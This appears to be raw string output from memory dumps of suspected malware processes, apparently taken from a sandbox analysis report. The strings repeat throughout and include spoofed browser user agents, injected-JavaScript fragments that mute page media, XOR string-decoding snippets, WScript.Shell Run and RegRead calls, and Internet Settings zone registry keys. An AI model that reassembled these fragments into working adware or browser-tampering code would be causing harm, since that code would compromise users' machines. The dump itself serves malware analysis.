Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2

IWebBrowser2

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

4,41494^4

4,41494^4

6%6X6v6

6%6X6v6

6*636@6~6

6*636@6~6

>0>>>[>~>

>0>>>[>~>

6%6s6

6%6s6

67

67

7%7X7

7%7X7

3%4,41464

3%4,41464

6-676H6l6v6}6

6-676H6l6v6}6

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

hwopt12052016001648_updater_service.exe_380_rwx_00A40000_0000C000:

o%Cyj

o%Cyj

W%Cyj!

W%Cyj!

?%Cyj"

?%Cyj"

'%Cyj#

'%Cyj#

%Cyj$

%Cyj$

regsvr32.exe_2952:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2

IWebBrowser2

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

4,41494^4

4,41494^4

6%6X6v6

6%6X6v6

6*636@6~6

6*636@6~6

>0>>>[>~>

>0>>>[>~>

6%6s6

6%6s6

67

67

7%7X7

7%7X7

3%4,41464

3%4,41464

6-676H6l6v6}6

6-676H6l6v6}6

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

regsvr32.exe_2952_rwx_00080000_00132000:

.idata

.idata

.reloc

.reloc

P.rsrc

P.rsrc

Portions Copyright (c) 1983,99 Borland

Portions Copyright (c) 1983,99 Borland

kernel32.dll

kernel32.dll

Software\Microsoft\Windows NT\CurrentVersion

Software\Microsoft\Windows NT\CurrentVersion

USER32.DLL

USER32.DLL

wininet.dll

wininet.dll

user32.dll

user32.dll

ntdll.dll

ntdll.dll

Kernel32.dll

Kernel32.dll

URLMON.DLL

URLMON.DLL

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

PSAPI.dll

PSAPI.dll

HTTP/1.1

HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('embed'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('object'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {var els=document.getElementsByTagName('video'); for(var i=0;i

try {jwplayer().play()} catch(e){}

try {jwplayer().play()} catch(e){}

IWebBrowser

IWebBrowser

IWebBrowserApp

IWebBrowserApp

IWebBrowser2

IWebBrowser2

.length;

.length;

=String.fromCharCode(parseInt(

=String.fromCharCode(parseInt(

.substr(

.substr(

,2),16));

,2),16));

=String.fromCharCode(

=String.fromCharCode(

,1).charCodeAt()^

,1).charCodeAt()^

,1).charCodeAt());

,1).charCodeAt());

.length-1)?

.length-1)?

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.Environment("Process"))("

.Environment("Process"))("

.Run("

.Run("

=new ActiveXObject("WScript.Shell");

=new ActiveXObject("WScript.Shell");

.RegRead("

.RegRead("

psapi.dll

psapi.dll

HTTP/1.1

HTTP/1.1

\\.\LCD

\\.\LCD

1234567890

1234567890

Shell32.dll

Shell32.dll

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones

0123456789

0123456789

Mozilla

Mozilla

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

.text

.text

`.rdata

`.rdata

@.pdata

@.pdata

KERNEL32.dll

KERNEL32.dll

@.reloc

@.reloc

222.dll

222.dll

GetKeyboardType

GetKeyboardType

advapi32.dll

advapi32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

oleaut32.dll

oleaut32.dll

RegOpenKeyExW

RegOpenKeyExW

RegDeleteKeyW

RegDeleteKeyW

RegCreateKeyW

RegCreateKeyW

RegCreateKeyA

RegCreateKeyA

version.dll

version.dll

gdi32.dll

gdi32.dll

SetProcessWindowStation

SetProcessWindowStation

OpenWindowStationA

OpenWindowStationA

EnumChildWindows

EnumChildWindows

HttpSendRequestA

HttpSendRequestA

HttpOpenRequestA

HttpOpenRequestA

FindNextUrlCacheEntryA

FindNextUrlCacheEntryA

FindFirstUrlCacheEntryA

FindFirstUrlCacheEntryA

FindCloseUrlCache

FindCloseUrlCache

DeleteUrlCacheEntry

DeleteUrlCacheEntry

ole32.dll

ole32.dll

wsock32.dll

wsock32.dll

winmm.dll

winmm.dll

atl.dll

atl.dll

wtsapi32.dll

wtsapi32.dll

Wtsapi32.dll

Wtsapi32.dll

PSAPI.DLL

PSAPI.DLL

shell32.dll

shell32.dll

ShellExecuteExW

ShellExecuteExW

NtQueryValueKey

NtQueryValueKey

NtDeleteValueKey

NtDeleteValueKey

NtSetValueKey

NtSetValueKey

urlmon.dll

urlmon.dll

UrlMkSetSessionOption

UrlMkSetSessionOption

4"4,414?4

4"4,414?4

4,41494^4

4,41494^4

6%6X6v6

6%6X6v6

6*636@6~6

6*636@6~6

>0>>>[>~>

>0>>>[>~>

6%6s6

6%6s6

67

67

7%7X7

7%7X7

3%4,41464

3%4,41464

6-676H6l6v6}6

6-676H6l6v6}6

Uh.EE

Uh.EE

WindowsUpdate

WindowsUpdate

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1

66006666

66006666

master.exe_1488:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

actualKey

actualKey

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

J!"#$J%J&'()*J ,JJJJJJJJ-J.JJ/0J1JJJJJJJJJJJJJJJJJJ23JJ4567JJ8JJJJJ9:;JJJJJ?JJJJJJJJ@JJJJJJAJJJJJBJJCJJJJJJJJJJJDEJJJJJJJFJGJJJJJJJJJJJJHJI

j.hHZg

j.hHZg

?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\strcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtempl.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afx.inl

CACHE_S_FORMATETC_NOTSUPPORTED

CACHE_S_FORMATETC_NOTSUPPORTED

CO_E_SERVER_EXEC_FAILURE

CO_E_SERVER_EXEC_FAILURE

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

REGDB_E_KEYMISSING

REGDB_E_KEYMISSING

CACHE_E_FIRST...CACHE_E_LAST

CACHE_E_FIRST...CACHE_E_LAST

CACHE_S_FIRST...CACHE_S_LAST

CACHE_S_FIRST...CACHE_S_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CO_E_FIRST...CO_E_LAST

CO_E_FIRST...CO_E_LAST

CO_S_FIRST...CO_S_LAST

CO_S_FIRST...CO_S_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_S_FIRST...DATA_S_LAST

DATA_S_FIRST...DATA_S_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_S_FIRST...ENUM_S_LAST

ENUM_S_FIRST...ENUM_S_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MK_E_FIRST...MK_E_LAST

MK_E_FIRST...MK_E_LAST

MK_S_FIRST...MK_S_LAST

MK_S_FIRST...MK_S_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_S_FIRST...OLE_S_LAST

OLE_S_FIRST...OLE_S_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_S_FIRST...REGDB_S_LAST

REGDB_S_FIRST...REGDB_S_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_S_FIRST...VIEW_S_LAST

VIEW_S_FIRST...VIEW_S_LAST

FACILITY_WINDOWS

FACILITY_WINDOWS

severity: %s, facility: %s ($lX)

severity: %s, facility: %s ($lX)

range: %s ($lX)

range: %s ($lX)

%s ($lX)

%s ($lX)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemisc.cpp

Warning: constructing COleException, scode = %s.

Warning: constructing COleException, scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

CNotSupportedException

CNotSupportedException

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\except.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtls_.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winstr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\apphelpx.cpp

KERNEL32.DLL

KERNEL32.DLL

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appcore.cpp

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

%s%s.dll

%s (%s:%d)

%s (%s:%d)

lX-X-x-XX-XXXXXX

lX-X-x-XX-XXXXXX

m_msgCur = {

m_msgCur = {

m_pszExeName =

m_pszExeName =

m_nCmdShow =

m_nCmdShow =

m_lpCmdLine =

m_lpCmdLine =

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxadv.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occmgr.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshellmanager.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appui3.cpp

RegCreateKeyTransactedA

RegCreateKeyTransactedA

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgcore.cpp

IGNORING command id 0xX sent to %hs dialog.

IGNORING command id 0xX sent to %hs dialog.

Routing command id 0xX to app.

Routing command id 0xX to app.

Routing command id 0xX to owner window.

Routing command id 0xX to owner window.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: Creating dialog from within a COleControlModule application is not a supported scenario.

Warning: ExecuteDlgInit failed during dialog init.

Warning: ExecuteDlgInit failed during dialog init.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog with IDD 0xX must have the child style.

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Dialog with IDD 0xX must be invisible.

ERROR: Dialog named '%s' must be invisible.

ERROR: Dialog named '%s' must be invisible.

ERROR: Cannot find dialog template with IDD 0xX.

ERROR: Cannot find dialog template with IDD 0xX.

ERROR: Cannot find dialog template named '%s'.

ERROR: Cannot find dialog template named '%s'.

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcomctl32.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdialogimpl.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\wincore.cpp

Warning: unknown WM_MEASUREITEM for menu item 0xX.

